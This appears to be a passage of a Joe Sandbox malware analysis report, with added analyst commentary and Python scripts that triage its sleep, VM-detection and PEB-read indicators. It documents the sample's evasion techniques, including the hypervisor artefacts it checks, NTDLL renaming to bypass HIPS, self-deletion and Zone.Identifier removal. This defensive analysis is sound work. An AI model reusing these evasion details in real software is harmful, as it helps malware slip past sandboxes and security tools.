Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_00426B60 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00426B60
Binary contains a suspicious time stamp
Source: 37D8.exe.6.dr Static PE information: 0x8B87D1F5 [Mon Mar 7 03:28:53 2044 UTC]
PE file contains sections with non-standard names
Source: y8WngeDn4q.exe Static PE information: section name: .zegu
Source: 4EDC.exe.6.dr Static PE information: section name: .cipizi
Source: 8908.exe.6.dr Static PE information: section name: .zegu
Source: C651.exe.6.dr Static PE information: section name: .xoj
Source: B74C.exe.6.dr Static PE information: section name: .yopu
Source: E4D7.exe.6.dr Static PE information: section name: .vif
Source: 6E1E.exe.6.dr Static PE information: section name: .daya
Source: esdfufc.6.dr Static PE information: section name: .zegu
Source: csdfufc.6.dr Static PE information: section name: .cipizi
Source: gbdfufc.6.dr Static PE information: section name: .daya
PE file contains an invalid checksum
Source: 60DF.exe.6.dr Static PE information: real checksum: 0x2bdee should be: 0x3529c
Source: 37D8.exe.6.dr Static PE information: real checksum: 0x8ddc4 should be: 0x7fd66
Source: 3FD8.exe.6.dr Static PE information: real checksum: 0x10f50 should be: 0x5be1
Source: 3AE.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x4147a
Source: E11F.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x114b9d
Source: initial sample Static PE information: section name: .text entropy: 6.98983847511
Source: initial sample Static PE information: section name: .text entropy: 7.85713092672
Source: initial sample Static PE information: section name: .text entropy: 7.38549549306
Source: initial sample Static PE information: section name: .text entropy: 7.29655075024
Source: initial sample Static PE information: section name: .text entropy: 6.98983847511
Source: initial sample Static PE information: section name: .text entropy: 7.8779018043
Source: initial sample Static PE information: section name: .text entropy: 7.83302446106
Source: initial sample Static PE information: section name: .text entropy: 7.66753616933
Source: initial sample Static PE information: section name: .text entropy: 7.86107035261
Source: initial sample Static PE information: section name: .text entropy: 7.66469899227
Source: initial sample Static PE information: section name: .text entropy: 7.79620991915
Source: initial sample Static PE information: section name: .text entropy: 6.98189062284
Source: initial sample Static PE information: section name: .text entropy: 6.98983847511
Source: initial sample Static PE information: section name: .text entropy: 7.38549549306
Source: initial sample Static PE information: section name: .text entropy: 6.98189062284

Persistence and Installation Behavior:

Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\esdfufc
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\csdfufc
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gbdfufc
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\B74C.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3AE.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\60DF.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\6E1E.exe
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe File created: C:\Users\user\AppData\Local\Temp\1105.tmp
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\4EDC.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3FD8.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\FBAD.exe
Source: C:\Users\user\AppData\Local\Temp\37D8.exe File created: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C651.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\FC0C.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gbdfufc
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\esdfufc
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8908.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\E4D7.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\E11F.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\37D8.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\DAA6.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\csdfufc
Source: C:\Users\user\AppData\Local\Temp\60DF.exe File created: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\D083.exe
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 25_2_00401306

Hooking and other Techniques for Hiding and Protection:

DLL reload attack detected
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\1105.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\y8wngedn4q.exe
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\esdfufc:Zone.Identifier read attributes | delete
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 25_2_00408E31
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: 37D8.exe PID: 6468, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 6E1E.exe, 0000001B.00000002.558082279.0000000002DDA000.00000004.00000020.sdmp Binary or memory string: ASWHOOK-X
Source: esdfufc, 0000000E.00000002.482643867.0000000001F70000.00000004.00000001.sdmp Binary or memory string: ASWHOOK1
Source: y8WngeDn4q.exe, 00000003.00000002.411777518.00000000004E8000.00000004.00000020.sdmp Binary or memory string: ASWHOOK#
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLUSER
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\esdfufc Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Renames NTDLL to bypass HIPS
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe File opened: C:\Windows\SysWOW64\ntdll.dll
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe File opened: C:\Windows\SysWOW64\ntdll.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe TID: 6124 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5776 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5564 Thread sleep time: -922337203685477s >= -30000s
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
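The delay values above are easier to read once converted: 922337203685477 is Int64.MaxValue (100-ns ticks) divided by 10000, i.e. TimeSpan.MaxValue truncated to milliseconds, so the PowerShell threads are not sleeping "a long time" but effectively forever, while the E4D7.exe sleep of 120000 is two minutes, above the 30 s evasion threshold but below the 3 min rule. The following triage helper is an added example, not code from Joe Sandbox or from the report; it assumes (as the -30000 threshold for the 30 s rule suggests) that the report's "s"-suffixed numbers are the raw millisecond argument of the sleep call, with the negative sign denoting a relative interval. The sample lines are copied from the report above and embedded so the script runs offline.

```python
import re
from typing import List, NamedTuple, Optional

# TimeSpan.MaxValue is Int64.MaxValue 100-ns ticks; truncated to milliseconds
# that is 922337203685477, exactly the delay the report shows for powershell.exe.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000

# Thresholds mirrored from the report's own rules: 30 s ("evasive loops")
# and 3 min ("long sleeps").
EVASIVE_MS = 30_000
LONG_MS = 180_000

# Assumption: the "s" suffix follows the raw sleep argument, which is a
# millisecond count; a negative value is a relative interval, hence abs().
SLEEP_RE = re.compile(
    r"^Source: (?P<proc>.+?)(?: TID: (?P<tid>\d+))? Thread "
    r"(?:sleep time: (?P<rel>-?\d+)s >= -\d+s|delayed: delay time: (?P<abs>\d+))$"
)

# Constructed sample: the sleep-related lines from this report.
SAMPLE_REPORT = r"""
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe TID: 6124 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5776 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
"""


class SleepEvent(NamedTuple):
    process: str        # image name only, e.g. "powershell.exe"
    tid: Optional[int]  # thread id when the report gives one
    ms: int             # delay in milliseconds, always positive
    label: str          # "short" | "evasive" | "long" | "infinite"


def classify_delay(ms: int) -> str:
    """Bucket a delay the way an analyst reads it; anything at or beyond the
    TimeSpan ceiling (including out-of-range junk) is an effectively infinite sleep."""
    if ms >= TIMESPAN_MAX_MS:
        return "infinite"
    if ms >= LONG_MS:
        return "long"
    if ms >= EVASIVE_MS:
        return "evasive"
    return "short"


def parse_sleep_lines(report: str) -> List[SleepEvent]:
    events = []
    for line in report.splitlines():
        m = SLEEP_RE.match(line.strip())
        if not m:
            continue
        ms = abs(int(m.group("rel") or m.group("abs")))
        process = m.group("proc").rsplit("\\", 1)[-1]
        tid = int(m.group("tid")) if m.group("tid") else None
        events.append(SleepEvent(process, tid, ms, classify_delay(ms)))
    return events


def worst_delay_per_process(events: List[SleepEvent]) -> dict:
    """Longest observed sleep per image, the figure worth putting in a triage note."""
    worst = {}
    for ev in events:
        if ev.process not in worst or ev.ms > worst[ev.process].ms:
            worst[ev.process] = ev
    return worst


if __name__ == "__main__":
    for ev in parse_sleep_lines(SAMPLE_REPORT):
        print(f"{ev.process:16} tid={ev.tid!s:6} {ev.ms:>18} ms  {ev.label}")
```

A sleep equal to TimeSpan.MaxValue is the signature of a thread parked for the life of the process, which is what a loader does with a helper thread it never intends to resume; the out-of-range 6456360425798339 value is treated the same way rather than being silently dropped.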
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 575
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 367
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4760
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3853
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3144
Found dropped PE file which has not been started or loaded
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3AE.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FBAD.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FC0C.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E11F.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAA6.exe
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C036B90 rdtsc 22_2_6C036B90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: explorer.exe, 00000006.00000000.387883837.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000006.00000000.373511562.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.383874507.000000000461E000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}e-1
Source: explorer.exe, 00000006.00000000.385268947.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: vmware
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: VMwareVBoxARun using valid operating system
Source: explorer.exe, 00000006.00000000.387883837.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000006.00000000.372864089.00000000082E2000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: explorer.exe, 00000006.00000000.385268947.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.403045513.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: AdvancedRun.exe, 00000019.00000002.527608014.00000000007AA000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
Source: AdvancedRun.exe, 00000019.00000002.527608014.00000000007AA000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.403045513.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000006.00000000.373511562.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: D083.exe, 0000002B.00000002.675692682.0000000000EDD000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000006.00000000.393764920.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\y8WngeDn4q.exe System information queried: ModuleInformation
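Not every VM-related string above carries the same weight. The device paths in explorer.exe and AdvancedRun.exe (SCSI\CdRom&Ven_NECVMWar..., STORAGE#Volume#...) are the sandbox's own hardware as Windows enumerates it, and "Hyper-V RAW" next to mswsock.dll is the Winsock provider name for AF_HYPERV sockets that any Windows 10 install carries; neither says anything about the process that held them. The strings in 37D8.exe are different in kind: driver file names (VBoxMouse.sys, vmmouse.sys, vmhgfs.sys), a registry path (SOFTWARE\VMware, Inc.\VMware Tools), a wine export name and "QEMU" are comparison targets for hypervisors the sandbox is not even running on, which is what an active check looks like. The classifier below is an added example (not part of the Joe Sandbox report); the family tokens and the probe heuristic are my own, and the sample lines are copied from the report above and embedded so it runs offline.

```python
import re
from typing import Dict, List, NamedTuple

LINE_RE = re.compile(
    r"^Source: (?P<proc>[^,]+), (?P<dump>\S+) Binary or memory string: (?P<s>.*)$"
)

# Hypervisor / emulator families and the tokens that identify them (own choice).
FAMILY_PATTERNS = {
    "VMware":     re.compile(r"vmware|vmmouse|vmhgfs|necvmwar", re.I),
    "VirtualBox": re.compile(r"vbox|virtualbox", re.I),
    "QEMU":       re.compile(r"qemu", re.I),
    "Wine":       re.compile(r"wine_get_unix_file_name", re.I),
    "Hyper-V":    re.compile(r"hyper-v", re.I),
}

# A string is a *probe* (something the code compares against) when it names a
# driver file, a registry path, an install directory, an export, or a hypervisor
# the sandbox is not running on (QEMU / VirtualBox on a VMware guest).
PROBE_RE = re.compile(
    r"\.sys\b|SOFTWARE\\|PROGRAM FILES|wine_get_unix_file_name|qemu|vbox", re.I
)
# "Hyper-V RAW" beside mswsock.dll is the AF_HYPERV Winsock provider name,
# present on every Windows 10 box: not a VM check.
WINSOCK_RE = re.compile(r"mswsock\.dll", re.I)

# Constructed sample: a subset of the memory-string lines from this report.
SAMPLE_REPORT = r"""
Source: explorer.exe, 00000006.00000000.387883837.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000006.00000000.373511562.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
Source: AdvancedRun.exe, 00000019.00000002.527608014.00000000007AA000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: D083.exe, 0000002B.00000002.675692682.0000000000EDD000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
"""


class VmString(NamedTuple):
    process: str
    dump: str
    text: str
    families: frozenset
    kind: str  # "probe" | "winsock" | "passive"


def classify_string(text: str) -> tuple:
    families = frozenset(n for n, rx in FAMILY_PATTERNS.items() if rx.search(text))
    if WINSOCK_RE.search(text):
        kind = "winsock"
    elif PROBE_RE.search(text):
        kind = "probe"
    else:
        kind = "passive"  # device names / friendly names the OS hands out
    return families, kind


def parse_vm_strings(report: str) -> List[VmString]:
    out = []
    for line in report.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        fam, kind = classify_string(m.group("s"))
        out.append(VmString(m.group("proc"), m.group("dump"), m.group("s"), fam, kind))
    return out


def per_process_verdict(strings: List[VmString]) -> Dict[str, dict]:
    """Families seen per process and whether any string was an active probe."""
    verdict: Dict[str, dict] = {}
    for s in strings:
        v = verdict.setdefault(s.process, {"families": set(), "kinds": set(), "active_probe": False})
        v["families"] |= s.families
        v["kinds"].add(s.kind)
        v["active_probe"] = v["active_probe"] or s.kind == "probe"
    return verdict


if __name__ == "__main__":
    for proc, v in per_process_verdict(parse_vm_strings(SAMPLE_REPORT)).items():
        print(f"{proc:16} probe={v['active_probe']!s:5} {sorted(v['families'])}")
```

The point of the split is prioritisation: a dump full of VMware device paths is noise on any VMware-hosted sandbox, whereas a process carrying VirtualBox and QEMU driver names on a VMware guest can only have brought them along as a check list.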

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\y8WngeDn4q.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\esdfufc System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe System information queried: CodeIntegrityInformation
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_00426B60 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00426B60
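A single LoadLibraryW/GetProcAddress/EncodePointer chain like the one above is common in benign binaries as well, so on its own it is weak evidence. The fs:[30h] entries under the next signature are the stronger signal: on 32-bit Windows fs:[30h] is the TEB's pointer to the PEB, and a function that reads it many times is typically walking PEB->Ldr to resolve APIs without an import table. Two things stand out when the entries are aggregated rather than read one by one: Joe Sandbox prints one line per PEB-reading instruction but labels each with the start address of the containing function, so the count of repeats per address ranks the functions by how hard they lean on the PEB; and the push dword ptr fs:[30h] stub sits at page offset 0x042 in y8WngeDn4q.exe, esdfufc and 8908.exe alike (0x04760042, 0x02CB0042, 0x02B60042), which is what the same unpacked code mapped at three different bases looks like. The aggregation below is an added example, not part of the report; the page-offset grouping is my own heuristic, and the sample reproduces a subset of the report's entries (the 22_2_6C0C1C06 entry recurs far more often in the report than the four copies kept here).

```python
import re
from collections import Counter, defaultdict
from typing import Dict, List, NamedTuple, Set, Tuple

PEB_RE = re.compile(
    r"^Source: (?P<proc>.+?) Code function: (?P<id>\d+_\d+_[0-9A-Fa-f]+) "
    r"(?P<instr>.+?) (?P=id)$"
)

# Constructed sample: a subset of the "Contains functionality to read the PEB"
# entries from this report.
SAMPLE_REPORT = r"""
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_04760042 push dword ptr fs:[00000030h] 0_2_04760042
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 12_2_02CB0042 push dword ptr fs:[00000030h] 12_2_02CB0042
Source: C:\Users\user\AppData\Local\Temp\8908.exe Code function: 13_2_02B60042 push dword ptr fs:[00000030h] 13_2_02B60042
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D740D mov eax, dword ptr fs:[00000030h] 22_2_6C0D740D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
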